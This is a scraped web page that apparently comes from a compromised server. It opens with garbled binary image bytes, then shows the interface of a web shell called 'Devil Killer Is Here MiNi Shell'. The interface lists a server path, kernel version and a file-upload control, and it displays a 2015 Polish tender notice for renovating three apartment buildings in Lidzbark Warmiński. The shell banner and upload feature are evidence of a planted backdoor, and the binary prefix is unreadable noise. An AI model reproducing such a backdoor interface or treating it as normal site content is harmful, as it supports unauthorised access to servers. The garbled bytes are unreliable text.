JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/33873-N-2015.html

<p class="kh_header"><b>Lidzbark Warmiński: Remont budynków  mieszkalnych   położonych przy ulicach:  Dąbrowskiego 5-7, Wiejskiej 33a i Wyszyńskiego 23 w Lidzbarku Warmińskim</b><br>
<b>Numer ogłoszenia: 33873 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Budynków Komunalnych Sp. z o.o. , ul. Lipowa 21, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7672750, faks 089 7672750.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynków  mieszkalnych   położonych przy ulicach:  Dąbrowskiego 5-7, Wiejskiej 33a i Wyszyńskiego 23 w Lidzbarku Warmińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont budynków mieszkalnych położonych  przy ulicach:  Dąbrowskiego 5-7, Wiejskiej 33a i Wyszyńskiego 23 w Lidzbarku Warmińskim z podziałem na trzy zadania . Zadanie I- remont budynku Dąbrowskiego 5-7 w zakresie: remont dachu z wymianą dachówki, remont elewacji wraz  z ociepleniem, przebudowa kominów ponad dachem, wymiana stolarki  budowlanej, wzmocnienie budynku, remont klatek schodowych wraz z wymiana instalacji elektrycznej,wymiana opaski   . Zadanie II- remont budynku Wiejska 33a w zakresie: wymiana pokrycia dachu z papy, remont elewacji wraz  z ociepleniem, remont kominów ponad dachem, wymiana stolarki  budowlanej, wykonanie izolacji ścian piwnicznych i wymiana opaski  przy budynku. Zadanie III remont budynku Wyszyńskiego 23 w zakresie:  remont elewacji , wymiana stolarki  budowlanej, remont klatki schodowej, remont schodów do budynku i wymiana opaski.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.1.	Oferta musi być zabezpieczona wadium w wysokości: 

Dla zadania częściowego nr 1: 8 000.00 PLN (słownie:  osiem tysięcy 00/100 PLN)
Dla zadania częściowego nr 2: 2 400.00 PLN (słownie:  dwa tysiące czterysta  00/100 PLN)
Dla zadania częściowego nr 3: 2 500.00 PLN (słownie:  dwa tysiące pięćset  00/100 PLN)
10.2.	Wadium  w wymaganej przez Zamawiają wysokości  należy wnieść przed upływem terminu składania ofert.
10.3.	Wadium może być wnoszone w jednej lub kilku następujących formach:
              a; pieniądzu: przelewem na rachunek bankowy Zamawiającego: Bank Pocztowy S.A.O/O Olsztyn 17 13201104 2995   
             9675 2000 0003 ; Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku przed   
             terminem składania ofert
b: poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c: gwarancjach bankowych;
d: gwarancjach ubezpieczeniowych;
e: poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z dnia 2007r. nr 42, poz. 275 z późn. zm.).
10.4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
10.5.	Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
10.6.	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.).
10.7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10.8.	Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
10.9.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10.10.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10.11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.), z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.), pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.), lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2013 r. poz. 907, z późn. zm.), co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę, jako najkorzystniejszej. 
10.12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b: nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c: zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony po podpisaniu oświadczenia ( załącznika nr 1). Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że  w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 1 robotę budowlaną, której przedmiotem było wykonanie remontu  budynku lub budowy nowego budynku o wartości  nie mniejszej niż 150.000,00 zł brutto oraz z załączy dowody dotyczące najważniejszych robót, określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;  Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje osobą która posiada uprawnienia do kierowania robotami budowlanymi  w  specjalności konstrukcyjno - budowlanej oraz  posiadającą aktualne zaświadczenie o wpisie na listę członków Izby Inżynierów Budownictwa. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje osobą która posiada uprawnienia do kierowania robotami budowlanymi  w  specjalności konstrukcyjno - budowlanej,  posiadającą aktualne zaświadczenie o wpisie na listę członków Izby Inżynierów Budownictwa
  Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełnionyspełniony  jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą  niż 300 000,00 zł  Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykaz powinien zawierać co najmniej 1 robotę budowlaną, której przedmiotem było wykonanie remontu starego budynku lub budowy nowego budynku o wartości nie mniejszej niż 150.000,00 zł brutto;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony wzór oferty na roboty budowlane Zaakceptowany wzór umowy Dowód wniesienia wadium Pełnomocnictwa Stosowne Pełnomocnictwo(a) - w przypadku, gdy uprawnienie do podpisania oferty nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Warunki płatności - 2</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2015 godzina 09:00, miejsce: w siedzibie Zamawiającego pokój nr 3.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont budynku  mieszkalnego  położonego przy ulicy  Dąbrowskiego 5-7 w Lidzbarku Warmińskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.             Przemurowanie kominów ponad dachem z cegły klinkierowej.
2.	Wymiana obróbek blacharskich na nowe z  blachy ocynkowanej
3.	Montaż   ław kominiarskich stalowych 
4.	Montaż włazu dachowego.
5.	Wymiana pokrycia dachowego z dachówki ceramicznej  na nową esówkę (  holenderkę) w kolorze naturalnej czerwieni ceglastej ( matową), 
6.	Wymiana całego łacenia dachu, częściowa wymiana deskowania dachu, położenie izolacji z papy .
7.	Wysunięcie pokrycia dachowego pod ocieplenie
8. Obicie  tynków kominów  na strychu i  ponowne otynkowanie
9. Usunięcie polepy na  strychu i położenie wełny mineralnej, wykonanie paraizolacji nad  lokalami  mieszkalnymi 
10. Wymiana podłóg drewnianych na strychu na płytę OSB
11. Uzupełnienie posadzi cementowej w piwnicy
12. Wykonanie  słupków z cegły klinkierowej  do  zamontowania  podciągu  w piwnicy i montaż podciągu
13. Wzmocnienie nadproży belkami stalowymi
14. Obicie tynków elewacji.
15. Wzmocnienie pękniętych ścian prętami stalowymi i założenie ściągów stalowych . 
16. Ocieplenie ścian zewnętrznych   elewacji  styropianem gr 10 cm
17. Renowacja  1 szt.  drzwi wejściowych do budynku i wymiana  2 szt.   drzwi w  budynku (zewnętrzne  i wewnętrzne )
18. Renowacja ( konserwacja ) detali architektonicznych  elewacji 
19. Położenie wyprawy elewacyjnej - tynk zabytkowy ( ziarno 2,5 mm) barwiony  w masie (zgodnie z załączonym programem prac  konserwatorskich) w  kolorach:  elewacja  NCS S 2010-Y30R, detale architektoniczne  ( opaski wokół okien i gzymsy) w kolorze białym 
20. Wymiana okien na drewniane zabytkowe  w     kolorze  NCS S 1505-Y30R  zgodnie z projektem (  w oknach  kuchennych i łazienkowych   muszą być zamontowane  w ramie okiennej   nawiewniki higrosterowane lub ciśnieniowe) , w piwnicach okna  z PCV uchylno- rozwierne w  kolorze   biały
 21. Rozebranie opaski betonowej  i ułożenie opaski  z kostki brukowej.. 
22.Naprawa 1 szt. schodów betonowych wejściowych do budynku i wykonanie 1 szt. nowych schodów z  kostki brukowej 
23. Remont dachu na ganku ( wiatrołapie ) w zakresie: wymiana deskowania, ocieplenie stropu wełna mineralna  i położenie papy termozgrzewalnej. 
24. Remont klatki schodowej polegający na uzupełnieniu tynków, zeskrobaniu starej farby,  szpachlowaniu ścian i malowaniu farbą emulsyjną i olejną, naprawie schodów i poręczy,   malowaniu elementów  drewnianych.
25.	Wymiana instalacji elektrycznej ( dwie klatki schodowe) polegający na  montażu szaf rozdzielczo- licznikowych 2 szt.  , wymianie linii zasilających do lokali, montażu rozdzielnic mieszkaniowych, wymianie instalacji oświetlenia klatki schodowej wraz  z osprzętem, wymianie instalacji  oświetleniowej piwnic oraz strychu wraz z osprzętem,  montaż  szyny wyrównawczej w   piwnicy, wykonaniu pomiarów po wykonaniu instalacji,  oplombowaniu liczników . 	

Szczegółowy zakres określa załączony  przedmiar robót, ekspertyza techniczna , projekt odtworzenia stolarki okiennej i drzwiowej  oraz  program prac  konserwatorskich.

 
Robota budowlana.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Warunki płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont budynku mieszkalmego  położonego przy ul. Wiejskiej 33a w Lidzbarku Warmińskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.             Remont kominów ponad dachem.
2.	Wymiana obróbek blacharskich  ( ogniomuru , rynien i rur spustowych) na nowe z  blachy ocynkowanej
3.	Wymiana drabiny  kominiarskiej na elewacji  
4.	Remont włazu dachowego.
5.	Remont dachu  w zakresie : zerwanie  starego pokrycia  dachu  z  papy i położenie nowego   pokrycia dachu ( 2 warstwy) pierwsza warstwa papa  podkładowa i druga warstwa papa  termozgrzewalna  gr 5,2mm    z kominkami wentylacyjnymi   ( 1 szt  na  40 m2 na dachu),
6.	Przeszycie pękniętych ścian prętami stalowymi . 
7. Ocieplenie ścian zewnętrznych   elewacji  styropianem gr 10 cm
8.  Wymiana    drzwi wejściowych do budynku  na nowe stalowe z futryną ,  kolor brązowy  , wyposażone  w  zamek   zapadkowy  , wkładkę i 3 klucze , klamki ze stali nierdzewnej  , podwójne uszczelki  z  EPDM  , wzmocnione  zawiasy  łożyskowane -   spawane  , odbój gumowy,   próg  stalowy z   nakładką ze stali   nierdzewnej, stopkę podporowa - dużą . samozamykacz  hydrauliczny drzwi z podwójną regulacją wymiar zewnętrzny drzwi  z futryną : 1060 x 2150 mm 
Wypełnienie drzwi : 
- dół  : wzmocniony  panel stalowy ciepły ( 2 blachy  proszkowo malowane z rdzeniem,  izolacyjnym )  
- góra  : podział na 3 pola   , pole środkowe - szyba a bezpieczna ,  atestowana 33.1 
Szerokość  szyby na środku drzwi to ok. 1/3 szerokości skrzydła drzwiowego  . 
Lewe / prawe - do ustalenia .  -Rysunek pogladowy w załaczeniu

9.  Położenie wyprawy elewacyjnej - tynk  mineralny ( ziarno 2,0 mm)  i malowanie  farba silikonową  w kolorach zgodnie z załączona kolorystyką  
 10. Wymiana okien na  nowe z PCV  ( w oknach kuchennych i jednym oknie  w pokoju  muszą być zamontowane  w ramie okiennej   nawiewniki higrosterowane lub ciśnieniowe) , - rysunek okna w załączeniu
 11. Rozebranie opaski betonowej,  osuszenie odkopanych  ścian , uzupełnienie tynków, spoinowanie kamieni fundamentowych  i   wykonaniu hydroizolacji ścian piwnicznych masą bitumiczną, położenie   folii bąbelkowej na izolowanych ścianach,   zasypaniu  wykopu i zagęszczeniu,  położeniu opaski  z kostki brukowej  , odtworzenie studzienek wsypowych w opasce i montaż  pokryw,
Szczegółowy zakres określa załączony  przedmiar robót,  projrkt kolorystyki ( wizualizacja) , rusunek  drzwi  i okien..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Warunki płatności - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont budynku mieszkalmego  położonego przy ul. Wyszyńskiego  23 w Lidzbarku Warmińskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obicie tynków elewacji.
2.	Wzmocnienie pękniętych ścian prętami stalowymi. 
3.              Wymiana okien na drewniane zabytkowe  zespolone w kolorze  białym  o   kształcie ( podziale )  zgodnie z  załaczonym rysunkiem   (  w oknach  kuchennych i w jednym pokoju   muszą być zamontowane  w ramie okiennej   nawiewniki higrosterowane lub ciśnieniowe)  .
4 . Wymiana  drzwi do budynku  w kolorach od wewnątrz  i od  zewnątrz w kolorze NCS-u S 4550-Y50R o wzorze jak  na załaczonych zdj eciach 
